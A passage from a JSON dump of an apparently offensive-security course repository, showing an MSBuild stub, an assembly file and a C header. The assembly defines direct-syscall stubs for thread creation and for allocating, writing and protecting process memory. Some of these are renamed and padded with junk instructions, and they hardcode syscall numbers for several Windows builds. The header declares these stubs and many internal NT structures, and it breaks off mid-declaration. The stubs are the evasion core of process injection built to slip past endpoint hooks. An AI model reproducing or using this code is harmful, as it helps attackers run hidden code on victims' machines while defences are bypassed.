    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <PropertyGroup />\r\n</Project>"
  },
  {
    "path": "chapter4-demo3/demo1/nt.asm",
    "content": ".code\r\nEXTERN SW3_GetSyscallNumber: PROC\r\n\r\nbye :\r\nret\r\n\r\nNtCreateThreadEx PROC\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 03EA48B99h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tsyscall                    ; Invoke system call.\r\n\tret\r\nNtCreateThreadEx ENDP\r\n\r\n\t\tANtCTE proc\r\n\t\t\tmov r12, rcx\r\n\t\t\tmov r13, rdx\r\n\t\t\tmov r14, r8\r\n\t\t\tmov r15, r9\r\n\r\n\t\t\tmov r10, rcx\r\n\t\t\txor rax, rax\r\n\t\t\t\tadd eax, 0C1h\t\t; 2004, 20H2\r\n\t\t\tsyscall\r\n\t\t\tcmp rax, 00\r\n\t\t\tje bye\r\n\r\n\t\t\tmov rcx, r12\r\n\t\t\tmov rdx, r13\r\n\t\t\tmov r8, r14\r\n\t\t\tmov r9, r15\r\n\r\n\t\t\tmov r10, rcx\r\n\t\t\txor rax, rax\r\n\t\t\t\tadd eax, 0BDh\t\t; 1903, 1909\r\n\t\t\tsyscall\r\n\t\t\tcmp rax, 00\r\n\t\t\tje bye\r\n\r\n\t\t\tmov rcx, r12\r\n\t\t\tmov rdx, r13\r\n\t\t\tmov r8, r14\r\n\t\t\tmov r9, r15\r\n\r\n\t\t\tmov r10, rcx\r\n\t\t\txor rax, rax\r\n\t\t\t\tadd eax, 0BCh\t\t; 1809\r\n\t\t\tsyscall\r\n\t\t\tcmp rax, 00\r\n\t\t\tje bye\r\n\t\tANtCTE endp\r\n\t\t\r\n\r\n\r\nBNtAVM proc\r\nmov r8, r10\r\nmov r10, 01h\r\nxor r10, r10\r\nmov r10, 0Ah\r\nmov r10, rcx\r\nxor eax, eax\r\nsub r8, r10\r\nadd eax, 18h; 1507 +\r\nxor r8, r8\r\nsyscall\r\nret\r\nBNtAVM endp\r\n\r\n\r\nBNtWVM proc\r\nadd rcx, 0Ah\r\nxor eax, eax\r\nmov r10, rcx\r\nadd eax, 3Ah; 1507 +\r\nsub r10, 0Ah\r\nsub rcx, 0Ah\r\nsyscall\r\nret\r\nBNtWVM endp\r\n\r\n\r\nBNtPVM proc\r\nadd r10, 1Ch\r\nxor eax, eax\r\nmov r10, rcx\r\nsub r10, 01h\r\nadd eax, 50h; 1507 +\r\nadd r10, 01h\r\nsyscall\r\nret\r\nBNtPVM endp\r\n\r\n\r\nend"
  },
  {
    "path": "chapter4-demo3/demo1/nt.h",
    "content": "#pragma once\r\n\r\n#ifndef SW3_HEADER_H_\r\n#define SW3_HEADER_H_\r\n\r\n#include <windows.h>\r\n\r\n#define SW3_SEED 0xA8EC79BB\r\n#define SW3_ROL8(v) (v << 8 | v >> 24)\r\n#define SW3_ROR8(v) (v >> 8 | v << 24)\r\n#define SW3_ROX8(v) ((SW3_SEED % 2) ? SW3_ROL8(v) : SW3_ROR8(v))\r\n#define SW3_MAX_ENTRIES 500\r\n#define SW3_RVA2VA(Type, DllBase, Rva) (Type)((ULONG_PTR) DllBase + Rva)\r\n\r\n#define STATUS_SUCCESS 0\r\n\r\nEXTERN_C NTSTATUS BNtAVM(\r\n\tHANDLE ProcessHandle,\r\n\tPVOID* BaseAddress,\r\n\tULONG_PTR ZeroBits,\r\n\tPSIZE_T RegionSize,\r\n\tULONG AllocationType,\r\n\tULONG Protect\r\n);\r\n\r\nEXTERN_C NTSTATUS BNtWVM(\r\n\tHANDLE hProcess,\r\n\tPVOID lpBaseAddress,\r\n\tPVOID lpBuffer,\r\n\tSIZE_T NumberOfBytesToRead,\r\n\tPSIZE_T NumberOfBytesRead\r\n);\r\n\r\nEXTERN_C NTSTATUS BNtPVM(\r\n\tHANDLE ProcessHandle,\r\n\tPVOID* BaseAddress,\r\n\tSIZE_T* NumberOfBytesToProtect,\r\n\tULONG NewAccessProtection,\r\n\tPULONG OldAccessProtection\r\n);\r\n\r\ntypedef struct _SW3_SYSCALL_ENTRY\r\n{\r\n\tDWORD Hash;\r\n\tDWORD Address;\r\n\tPVOID SyscallAddress;\r\n} SW3_SYSCALL_ENTRY, * PSW3_SYSCALL_ENTRY;\r\n\r\ntypedef struct _SW3_SYSCALL_LIST\r\n{\r\n\tDWORD Count;\r\n\tSW3_SYSCALL_ENTRY Entries[SW3_MAX_ENTRIES];\r\n} SW3_SYSCALL_LIST, * PSW3_SYSCALL_LIST;\r\n\r\ntypedef struct _SW3_PEB_LDR_DATA {\r\n\tBYTE Reserved1[8];\r\n\tPVOID Reserved2[3];\r\n\tLIST_ENTRY InMemoryOrderModuleList;\r\n} SW3_PEB_LDR_DATA, * PSW3_PEB_LDR_DATA;\r\n\r\ntypedef struct _SW3_LDR_DATA_TABLE_ENTRY {\r\n\tPVOID Reserved1[2];\r\n\tLIST_ENTRY InMemoryOrderLinks;\r\n\tPVOID Reserved2[2];\r\n\tPVOID DllBase;\r\n} SW3_LDR_DATA_TABLE_ENTRY, * PSW3_LDR_DATA_TABLE_ENTRY;\r\n\r\ntypedef struct _SW3_PEB {\r\n\tBYTE Reserved1[2];\r\n\tBYTE BeingDebugged;\r\n\tBYTE Reserved2[1];\r\n\tPVOID Reserved3[2];\r\n\tPSW3_PEB_LDR_DATA Ldr;\r\n} SW3_PEB, * PSW3_PEB;\r\n\r\nDWORD SW3_HashSyscall(PCSTR FunctionName);\r\nBOOL SW3_PopulateSyscallList();\r\nEXTERN_C DWORD 
SW3_GetSyscallNumber(DWORD FunctionHash);\r\nEXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash);\r\nEXTERN_C PVOID internal_cleancall_wow64_gate(VOID);\r\ntypedef struct _UNICODE_STRING\r\n{\r\n\tUSHORT Length;\r\n\tUSHORT MaximumLength;\r\n\tPWSTR  Buffer;\r\n} UNICODE_STRING, * PUNICODE_STRING;\r\n\r\ntypedef struct _SYSTEM_HANDLE\r\n{\r\n\tULONG ProcessId;\r\n\tBYTE ObjectTypeNumber;\r\n\tBYTE Flags;\r\n\tUSHORT Handle;\r\n\tPVOID Object;\r\n\tACCESS_MASK GrantedAccess;\r\n} SYSTEM_HANDLE, * PSYSTEM_HANDLE;\r\n\r\ntypedef struct _TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE\r\n{\r\n\tPVOID pValue;\r\n\tULONG ValueLength;\r\n} TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE, * PTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE;\r\n\r\ntypedef struct _TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE\r\n{\r\n\tULONG64        Version;\r\n\tUNICODE_STRING Name;\r\n} TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE, * PTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE;\r\n\r\ntypedef struct _WNF_TYPE_ID\r\n{\r\n\tGUID TypeId;\r\n} WNF_TYPE_ID, * PWNF_TYPE_ID;\r\n\r\ntypedef enum _PS_CREATE_STATE\r\n{\r\n\tPsCreateInitialState,\r\n\tPsCreateFailOnFileOpen,\r\n\tPsCreateFailOnSectionCreate,\r\n\tPsCreateFailExeFormat,\r\n\tPsCreateFailMachineMismatch,\r\n\tPsCreateFailExeName,\r\n\tPsCreateSuccess,\r\n\tPsCreateMaximumStates\r\n} PS_CREATE_STATE, * PPS_CREATE_STATE;\r\n\r\ntypedef enum _KCONTINUE_TYPE\r\n{\r\n\tKCONTINUE_UNWIND,\r\n\tKCONTINUE_RESUME,\r\n\tKCONTINUE_LONGJUMP,\r\n\tKCONTINUE_SET,\r\n\tKCONTINUE_LAST\r\n} KCONTINUE_TYPE;\r\n\r\ntypedef struct _IO_STATUS_BLOCK\r\n{\r\n\tunion\r\n\t{\r\n\t\tNTSTATUS Status;\r\n\t\tVOID* Pointer;\r\n\t};\r\n\tULONG_PTR Information;\r\n} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;\r\n\r\ntypedef struct _SYSTEM_HANDLE_INFORMATION\r\n{\r\n\tULONG HandleCount;\r\n\tSYSTEM_HANDLE Handles[1];\r\n} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;\r\n\r\ntypedef struct _CLIENT_ID\r\n{\r\n\tHANDLE UniqueProcess;\r\n\tHANDLE UniqueThread;\r\n} CLIENT_ID, * 
PCLIENT_ID;\r\n\r\ntypedef enum _PLUGPLAY_EVENT_CATEGORY\r\n{\r\n\tHardwareProfileChangeEvent,\r\n\tTargetDeviceChangeEvent,\r\n\tDeviceClassChangeEvent,\r\n\tCustomDeviceEvent,\r\n\tDeviceInstallEvent,\r\n\tDeviceArrivalEvent,\r\n\tPowerEvent,\r\n\tVetoEvent,\r\n\tBlockedDriverEvent,\r\n\tInvalidIDEvent,\r\n\tMaxPlugEventCategory\r\n} PLUGPLAY_EVENT_CATEGORY, * PPLUGPLAY_EVENT_CATEGORY;\r\n\r\ntypedef enum _PNP_VETO_TYPE\r\n{\r\n\tPNP_VetoTypeUnknown, // unspecified\r\n\tPNP_VetoLegacyDevice, // instance path\r\n\tPNP_VetoPendingClose, // instance path\r\n\tPNP_VetoWindowsApp, // module\r\n\tPNP_VetoWindowsService, // service\r\n\tPNP_VetoOutstandingOpen, // instance path\r\n\tPNP_VetoDevice, // instance path\r\n\tPNP_VetoDriver, // driver service name\r\n\tPNP_VetoIllegalDeviceRequest, // instance path\r\n\tPNP_VetoInsufficientPower, // unspecified\r\n\tPNP_VetoNonDisableable, // instance path\r\n\tPNP_VetoLegacyDriver, // service\r\n\tPNP_VetoInsufficientRights  // unspecified\r\n} PNP_VETO_TYPE, * PPNP_VETO_TYPE;\r\n\r\ntypedef struct _TOKEN_SECURITY_ATTRIBUTE_V1\r\n{\r\n\tUNICODE_STRING Name;\r\n\tUSHORT         ValueType;\r\n\tUSHORT         Reserved;\r\n\tULONG          Flags;\r\n\tULONG          ValueCount;\r\n\tunion\r\n\t{\r\n\t\tPLONG64                                      pInt64;\r\n\t\tPULONG64                                     pUint64;\r\n\t\tPUNICODE_STRING                              pString;\r\n\t\tPTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE         pFqbn;\r\n\t\tPTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE pOctetString;\r\n\t} Values;\r\n} TOKEN_SECURITY_ATTRIBUTE_V1, * PTOKEN_SECURITY_ATTRIBUTE_V1;\r\n\r\ntypedef VOID(KNORMAL_ROUTINE) (\r\n\tIN PVOID NormalContext,\r\n\tIN PVOID SystemArgument1,\r\n\tIN PVOID SystemArgument2);\r\n\r\ntypedef struct _PS_ATTRIBUTE\r\n{\r\n\tULONG  Attribute;\r\n\tSIZE_T Size;\r\n\tunion\r\n\t{\r\n\t\tULONG Value;\r\n\t\tPVOID ValuePtr;\r\n\t} u1;\r\n\tPSIZE_T ReturnLength;\r\n} PS_ATTRIBUTE, * 
PPS_ATTRIBUTE;\r\n\r\ntypedef struct _WNF_STATE_NAME\r\n{\r\n\tULONG Data[2];\r\n} WNF_STATE_NAME, * PWNF_STATE_NAME;\r\n\r\n#ifndef InitializeObjectAttributes\r\n#define InitializeObjectAttributes( p, n, a, r, s ) { \\\r\n\t(p)->Length = sizeof( OBJECT_ATTRIBUTES );        \\\r\n\t(p)->RootDirectory = r;                           \\\r\n\t(p)->Attributes = a;                              \\\r\n\t(p)->ObjectName = n;                              \\\r\n\t(p)->SecurityDescriptor = s;                      \\\r\n\t(p)->SecurityQualityOfService = NULL;             \\\r\n}\r\n#endif\r\n\r\ntypedef struct _KEY_VALUE_ENTRY\r\n{\r\n\tPUNICODE_STRING ValueName;\r\n\tULONG           DataLength;\r\n\tULONG           DataOffset;\r\n\tULONG           Type;\r\n} KEY_VALUE_ENTRY, * PKEY_VALUE_ENTRY;\r\n\r\ntypedef enum _KEY_SET_INFORMATION_CLASS\r\n{\r\n\tKeyWriteTimeInformation,\r\n\tKeyWow64FlagsInformation,\r\n\tKeyControlFlagsInformation,\r\n\tKeySetVirtualizationInformation,\r\n\tKeySetDebugInformation,\r\n\tKeySetHandleTagsInformation,\r\n\tMaxKeySetInfoClass  // MaxKeySetInfoClass should always be the last enum.\r\n} KEY_SET_INFORMATION_CLASS, * PKEY_SET_INFORMATION_CLASS;\r\n\r\ntypedef enum _SYSTEM_INFORMATION_CLASS\r\n{\r\n\tSystemBasicInformation = 0,\r\n\tSystemPerformanceInformation = 2,\r\n\tSystemTimeOfDayInformation = 3,\r\n\tSystemProcessInformation = 5,\r\n\tSystemProcessorPerformanceInformation = 8,\r\n\tSystemHandleInformation = 16,\r\n\tSystemInterruptInformation = 23,\r\n\tSystemExceptionInformation = 33,\r\n\tSystemRegistryQuotaInformation = 37,\r\n\tSystemLookasideInformation = 45,\r\n\tSystemCodeIntegrityInformation = 103,\r\n\tSystemPolicyInformation = 134,\r\n} SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS;\r\n\r\ntypedef enum _PROCESSINFOCLASS\r\n{\r\n\tProcessBasicInformation = 0,\r\n\tProcessDebugPort = 7,\r\n\tProcessWow64Information = 26,\r\n\tProcessImageFileName = 27,\r\n\tProcessBreakOnTermination = 29\r\n} PROCESSINFOCLASS, * 
PPROCESSINFOCLASS;\r\n\r\ntypedef struct _MEMORY_RANGE_ENTRY\r\n{\r\n\tPVOID  VirtualAddress;\r\n\tSIZE_T NumberOfBytes;\r\n} MEMORY_RANGE_ENTRY, * PMEMORY_RANGE_ENTRY;\r\n\r\ntypedef struct _T2_SET_PARAMETERS_V0\r\n{\r\n\tULONG    Version;\r\n\tULONG    Reserved;\r\n\tLONGLONG NoWakeTolerance;\r\n} T2_SET_PARAMETERS, * PT2_SET_PARAMETERS;\r\n\r\ntypedef struct _FILE_PATH\r\n{\r\n\tULONG Version;\r\n\tULONG Length;\r\n\tULONG Type;\r\n\tCHAR  FilePath[1];\r\n} FILE_PATH, * PFILE_PATH;\r\n\r\ntypedef struct _FILE_USER_QUOTA_INFORMATION\r\n{\r\n\tULONG         NextEntryOffset;\r\n\tULONG         SidLength;\r\n\tLARGE_INTEGER ChangeTime;\r\n\tLARGE_INTEGER QuotaUsed;\r\n\tLARGE_INTEGER QuotaThreshold;\r\n\tLARGE_INTEGER QuotaLimit;\r\n\tSID           Sid[1];\r\n} FILE_USER_QUOTA_INFORMATION, * PFILE_USER_QUOTA_INFORMATION;\r\n\r\ntypedef struct _FILE_QUOTA_LIST_INFORMATION\r\n{\r\n\tULONG NextEntryOffset;\r\n\tULONG SidLength;\r\n\tSID   Sid[1];\r\n} FILE_QUOTA_LIST_INFORMATION, * PFILE_QUOTA_LIST_INFORMATION;\r\n\r\ntypedef struct _FILE_NETWORK_OPEN_INFORMATION\r\n{\r\n\tLARGE_INTEGER CreationTime;\r\n\tLARGE_INTEGER LastAccessTime;\r\n\tLARGE_INTEGER LastWriteTime;\r\n\tLARGE_INTEGER ChangeTime;\r\n\tLARGE_INTEGER AllocationSize;\r\n\tLARGE_INTEGER EndOfFile;\r\n\tULONG         FileAttributes;\r\n\tULONG         Unknown;\r\n} FILE_NETWORK_OPEN_INFORMATION, * PFILE_NETWORK_OPEN_INFORMATION;\r\n\r\ntypedef enum _FILTER_BOOT_OPTION_OPERATION\r\n{\r\n\tFilterBootOptionOperationOpenSystemStore,\r\n\tFilterBootOptionOperationSetElement,\r\n\tFilterBootOptionOperationDeleteElement,\r\n\tFilterBootOptionOperationMax\r\n} FILTER_BOOT_OPTION_OPERATION, * PFILTER_BOOT_OPTION_OPERATION;\r\n\r\ntypedef enum _EVENT_TYPE\r\n{\r\n\tNotificationEvent = 0,\r\n\tSynchronizationEvent = 1,\r\n} EVENT_TYPE, * PEVENT_TYPE;\r\n\r\ntypedef struct _FILE_FULL_EA_INFORMATION\r\n{\r\n\tULONG  NextEntryOffset;\r\n\tUCHAR  Flags;\r\n\tUCHAR  EaNameLength;\r\n\tUSHORT EaValueLength;\r\n\tCHAR   
EaName[1];\r\n} FILE_FULL_EA_INFORMATION, * PFILE_FULL_EA_INFORMATION;\r\n\r\ntypedef struct _FILE_GET_EA_INFORMATION\r\n{\r\n\tULONG NextEntryOffset;\r\n\tBYTE  EaNameLength;\r\n\tCHAR  EaName[1];\r\n} FILE_GET_EA_INFORMATION, * PFILE_GET_EA_INFORMATION;\r\n\r\ntypedef struct _BOOT_OPTIONS\r\n{\r\n\tULONG Version;\r\n\tULONG Length;\r\n\tULONG Timeout;\r\n\tULONG CurrentBootEntryId;\r\n\tULONG NextBootEntryId;\r\n\tWCHAR HeadlessRedirection[1];\r\n} BOOT_OPTIONS, * PBOOT_OPTIONS;\r\n\r\ntypedef ULONG WNF_CHANGE_STAMP, * PWNF_CHANGE_STAMP;\r\n\r\ntypedef enum _WNF_DATA_SCOPE\r\n{\r\n\tWnfDataScopeSystem = 0,\r\n\tWnfDataScopeSession = 1,\r\n\tWnfDataScopeUser = 2,\r\n\tWnfDataScopeProcess = 3,\r\n\tWnfDataScopeMachine = 4\r\n} WNF_DATA_SCOPE, * PWNF_DATA_SCOPE;\r\n\r\ntypedef enum _WNF_STATE_NAME_LIFETIME\r\n{\r\n\tWnfWellKnownStateName = 0,\r\n\tWnfPermanentStateName = 1,\r\n\tWnfPersistentStateName = 2,\r\n\tWnfTemporaryStateName = 3\r\n} WNF_STATE_NAME_LIFETIME, * PWNF_STATE_NAME_LIFETIME;\r\n\r\ntypedef enum _VIRTUAL_MEMORY_INFORMATION_CLASS\r\n{\r\n\tVmPrefetchInformation,\r\n\tVmPagePriorityInformation,\r\n\tVmCfgCallTargetInformation\r\n} VIRTUAL_MEMORY_INFORMATION_CLASS, * PVIRTUAL_MEMORY_INFORMATION_CLASS;\r\n\r\ntypedef enum _IO_SESSION_EVENT\r\n{\r\n\tIoSessionEventIgnore,\r\n\tIoSessionEventCreated,\r\n\tIoSessionEventTerminated,\r\n\tIoSessionEventConnected,\r\n\tIoSessionEventDisconnected,\r\n\tIoSessionEventLogon,\r\n\tIoSessionEventLogoff,\r\n\tIoSessionEventMax\r\n} IO_SESSION_EVENT, * PIO_SESSION_EVENT;\r\n\r\ntypedef enum _PORT_INFORMATION_CLASS\r\n{\r\n\tPortBasicInformation,\r\n#if DEVL\r\n\tPortDumpInformation\r\n#endif\r\n} PORT_INFORMATION_CLASS, * PPORT_INFORMATION_CLASS;\r\n\r\ntypedef enum 
_PLUGPLAY_CONTROL_CLASS\r\n{\r\n\tPlugPlayControlEnumerateDevice,\r\n\tPlugPlayControlRegisterNewDevice,\r\n\tPlugPlayControlDeregisterDevice,\r\n\tPlugPlayControlInitializeDevice,\r\n\tPlugPlayControlStartDevice,\r\n\tPlugPlayControlUnlockDevice,\r\n\tPlugPlayControlQueryAndRemoveDevice,\r\n\tPlugPlayControlUserResponse,\r\n\tPlugPlayControlGenerateLegacyDevice,\r\n\tPlugPlayControlGetInterfaceDeviceList,\r\n\tPlugPlayControlProperty,\r\n\tPlugPlayControlDeviceClassAssociation,\r\n\tPlugPlayControlGetRelatedDevice,\r\n\tPlugPlayControlGetInterfaceDeviceAlias,\r\n\tPlugPlayControlDeviceStatus,\r\n\tPlugPlayControlGetDeviceDepth,\r\n\tPlugPlayControlQueryDeviceRelations,\r\n\tPlugPlayControlTargetDeviceRelation,\r\n\tPlugPlayControlQueryConflictList,\r\n\tPlugPlayControlRetrieveDock,\r\n\tPlugPlayControlResetDevice,\r\n\tPlugPlayControlHaltDevice,\r\n\tPlugPlayControlGetBlockedDriverList,\r\n\tMaxPlugPlayControl\r\n} PLUGPLAY_CONTROL_CLASS, * PPLUGPLAY_CONTROL_CLASS;\r\n\r\ntypedef enum _IO_COMPLETION_INFORMATION_CLASS\r\n{\r\n\tIoCompletionBasicInformation\r\n} IO_COMPLETION_INFORMATION_CLASS, * PIO_COMPLETION_INFORMATION_CLASS;\r\n\r\ntypedef enum _SECTION_INHERIT\r\n{\r\n\tViewShare = 1,\r\n\tViewUnmap = 2\r\n} SECTION_INHERIT, * PSECTION_INHERIT;\r\n\r\ntypedef enum _DEBUGOBJECTINFOCLASS\r\n{\r\n\tDebugObjectFlags = 1,\r\n\tMaxDebugObjectInfoClass\r\n} DEBUGOBJECTINFOCLASS, * PDEBUGOBJECTINFOCLASS;\r\n\r\ntypedef enum _SEMAPHORE_INFORMATION_CLASS\r\n{\r\n\tSemaphoreBasicInformation\r\n} SEMAPHORE_INFORMATION_CLASS, * PSEMAPHORE_INFORMATION_CLASS;\r\n\r\ntypedef struct _PS_ATTRIBUTE_LIST\r\n{\r\n\tSIZE_T       TotalLength;\r\n\tPS_ATTRIBUTE Attributes[1];\r\n} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;\r\n\r\ntypedef enum 
_VDMSERVICECLASS\r\n{\r\n\tVdmStartExecution,\r\n\tVdmQueueInterrupt,\r\n\tVdmDelayInterrupt,\r\n\tVdmInitialize,\r\n\tVdmFeatures,\r\n\tVdmSetInt21Handler,\r\n\tVdmQueryDir,\r\n\tVdmPrinterDirectIoOpen,\r\n\tVdmPrinterDirectIoClose,\r\n\tVdmPrinterInitialize,\r\n\tVdmSetLdtEntries,\r\n\tVdmSetProcessLdtInfo,\r\n\tVdmAdlibEmulation,\r\n\tVdmPMCliControl,\r\n\tVdmQueryVdmProcess\r\n} VDMSERVICECLASS, * PVDMSERVICECLASS;\r\n\r\ntypedef struct _PS_CREATE_INFO\r\n{\r\n\tSIZE_T Size;\r\n\tPS_CREATE_STATE State;\r\n\tunion\r\n\t{\r\n\t\t// PsCreateInitialState\r\n\t\tstruct {\r\n\t\t\tunion {\r\n\t\t\t\tULONG InitFlags;\r\n\t\t\t\tstruct {\r\n\t\t\t\t\tUCHAR  WriteOutputOnExit : 1;\r\n\t\t\t\t\tUCHAR  DetectManifest : 1;\r\n\t\t\t\t\tUCHAR  IFEOSkipDebugger : 1;\r\n\t\t\t\t\tUCHAR  IFEODoNotPropagateKeyState : 1;\r\n\t\t\t\t\tUCHAR  SpareBits1 : 4;\r\n\t\t\t\t\tUCHAR  SpareBits2 : 8;\r\n\t\t\t\t\tUSHORT ProhibitedImageCharacteristics : 16;\r\n\t\t\t\t};\r\n\t\t\t};\r\n\t\t\tACCESS_MASK AdditionalFileAccess;\r\n\t\t} InitState;\r\n\t\t// PsCreateFailOnSectionCreate\r\n\t\tstruct {\r\n\t\t\tHANDLE FileHandle;\r\n\t\t} FailSection;\r\n\t\t// PsCreateFailExeFormat\r\n\t\tstruct {\r\n\t\t\tUSHORT DllCharacteristics;\r\n\t\t} ExeFormat;\r\n\t\t// PsCreateFailExeName\r\n\t\tstruct {\r\n\t\t\tHANDLE IFEOKey;\r\n\t\t} ExeName;\r\n\t\t// PsCreateSuccess\r\n\t\tstruct {\r\n\t\t\tunion {\r\n\t\t\t\tULONG OutputFlags;\r\n\t\t\t\tstruct {\r\n\t\t\t\t\tUCHAR  ProtectedProcess : 1;\r\n\t\t\t\t\tUCHAR  AddressSpaceOverride : 1;\r\n\t\t\t\t\tUCHAR  DevOverrideEnabled : 1; // from Image File Execution Options\r\n\t\t\t\t\tUCHAR  ManifestDetected : 1;\r\n\t\t\t\t\tUCHAR  ProtectedProcessLight : 1;\r\n\t\t\t\t\tUCHAR  SpareBits1 : 3;\r\n\t\t\t\t\tUCHAR  SpareBits2 : 8;\r\n\t\t\t\t\tUSHORT SpareBits3 : 16;\r\n\t\t\t\t};\r\n\t\t\t};\r\n\t\t\tHANDLE    FileHandle;\r\n\t\t\tHANDLE    SectionHandle;\r\n\t\t\tULONGLONG UserProcessParametersNative;\r\n\t\t\tULONG     
UserProcessParametersWow64;\r\n\t\t\tULONG     CurrentParameterFlags;\r\n\t\t\tULONGLONG PebAddressNative;\r\n\t\t\tULONG     PebAddressWow64;\r\n\t\t\tULONGLONG ManifestAddress;\r\n\t\t\tULONG     ManifestSize;\r\n\t\t} SuccessState;\r\n\t};\r\n} PS_CREATE_INFO, * PPS_CREATE_INFO;\r\n\r\ntypedef enum _MEMORY_INFORMATION_CLASS\r\n{\r\n\tMemoryBasicInformation,\r\n\tMemoryWorkingSetInformation,\r\n\tMemoryMappedFilenameInformation,\r\n\tMemoryRegionInformation,\r\n\tMemoryWorkingSetExInformation,\r\n\tMemorySharedCommitInformation,\r\n\tMemoryImageInformation,\r\n\tMemoryRegionInformationEx,\r\n\tMemoryPrivilegedBasicInformation,\r\n\tMemoryEnclaveImageInformation,\r\n\tMemoryBasicInformationCapped\r\n} MEMORY_INFORMATION_CLASS, * PMEMORY_INFORMATION_CLASS;\r\n\r\ntypedef enum _MEMORY_RESERVE_TYPE\r\n{\r\n\tMemoryReserveUserApc,\r\n\tMemoryReserveIoCompletion,\r\n\tMemoryReserveTypeMax\r\n} MEMORY_RESERVE_TYPE, * PMEMORY_RESERVE_TYPE;\r\n\r\ntypedef enum _ALPC_PORT_INFORMATION_CLASS\r\n{\r\n\tAlpcBasicInformation,\r\n\tAlpcPortInformation,\r\n\tAlpcAssociateCompletionPortInformation,\r\n\tAlpcConnectedSIDInformation,\r\n\tAlpcServerInformation,\r\n\tAlpcMessageZoneInformation,\r\n\tAlpcRegisterCompletionListInformation,\r\n\tAlpcUnregisterCompletionListInformation,\r\n\tAlpcAdjustCompletionListConcurrencyCountInformation,\r\n\tAlpcRegisterCallbackInformation,\r\n\tAlpcCompletionListRundownInformation\r\n} ALPC_PORT_INFORMATION_CLASS, * PALPC_PORT_INFORMATION_CLASS;\r\n\r\ntypedef struct _ALPC_CONTEXT_ATTR\r\n{\r\n\tPVOID PortContext;\r\n\tPVOID MessageContext;\r\n\tULONG SequenceNumber;\r\n\tULONG MessageID;\r\n\tULONG CallbackID;\r\n} ALPC_CONTEXT_ATTR, * PALPC_CONTEXT_ATTR;\r\n\r\ntypedef struct _ALPC_DATA_VIEW_ATTR\r\n{\r\n\tULONG  Flags;\r\n\tHANDLE SectionHandle;\r\n\tPVOID  ViewBase;\r\n\tSIZE_T ViewSize;\r\n} ALPC_DATA_VIEW_ATTR, * PALPC_DATA_VIEW_ATTR;\r\n\r\ntypedef struct _ALPC_SECURITY_ATTR\r\n{\r\n\tULONG                        
Flags;\r\n\tPSECURITY_QUALITY_OF_SERVICE SecurityQos;\r\n\tHANDLE                       ContextHandle;\r\n\tULONG                        Reserved1;\r\n\tULONG                        Reserved2;\r\n} ALPC_SECURITY_ATTR, * PALPC_SECURITY_ATTR;\r\n\r\ntypedef PVOID* PPVOID;\r\n\r\ntypedef enum _KPROFILE_SOURCE\r\n{\r\n\tProfileTime = 0,\r\n\tProfileAlignmentFixup = 1,\r\n\tProfileTotalIssues = 2,\r\n\tProfilePipelineDry = 3,\r\n\tProfileLoadInstructions = 4,\r\n\tProfilePipelineFrozen = 5,\r\n\tProfileBranchInstructions = 6,\r\n\tProfileTotalNonissues = 7,\r\n\tProfileDcacheMisses = 8,\r\n\tProfileIcacheMisses = 9,\r\n\tProfileCacheMisses = 10,\r\n\tProfileBranchMispredictions = 11,\r\n\tProfileStoreInstructions = 12,\r\n\tProfileFpInstructions = 13,\r\n\tProfileIntegerInstructions = 14,\r\n\tProfile2Issue = 15,\r\n\tProfile3Issue = 16,\r\n\tProfile4Issue = 17,\r\n\tProfileSpecialInstructions = 18,\r\n\tProfileTotalCycles = 19,\r\n\tProfileIcacheIssues = 20,\r\n\tProfileDcacheAccesses = 21,\r\n\tProfileMemoryBarrierCycles = 22,\r\n\tProfileLoadLinkedIssues = 23,\r\n\tProfileMaximum = 24,\r\n} KPROFILE_SOURCE, * PKPROFILE_SOURCE;\r\n\r\ntypedef enum _ALPC_MESSAGE_INFORMATION_CLASS\r\n{\r\n\tAlpcMessageSidInformation,\r\n\tAlpcMessageTokenModifiedIdInformation\r\n} ALPC_MESSAGE_INFORMATION_CLASS, * PALPC_MESSAGE_INFORMATION_CLASS;\r\n\r\ntypedef enum _WORKERFACTORYINFOCLASS\r\n{\r\n\tWorkerFactoryTimeout,\r\n\tWorkerFactoryRetryTimeout,\r\n\tWorkerFactoryIdleTimeout,\r\n\tWorkerFactoryBindingCount,\r\n\tWorkerFactoryThreadMinimum,\r\n\tWorkerFactoryThreadMaximum,\r\n\tWorkerFactoryPaused,\r\n\tWorkerFactoryBasicInformation,\r\n\tWorkerFactoryAdjustThreadGoal,\r\n\tWorkerFactoryCallbackType,\r\n\tWorkerFactoryStackInformation,\r\n\tMaxWorkerFactoryInfoClass\r\n} WORKERFACTORYINFOCLASS, * PWORKERFACTORYINFOCLASS;\r\n\r\ntypedef enum 
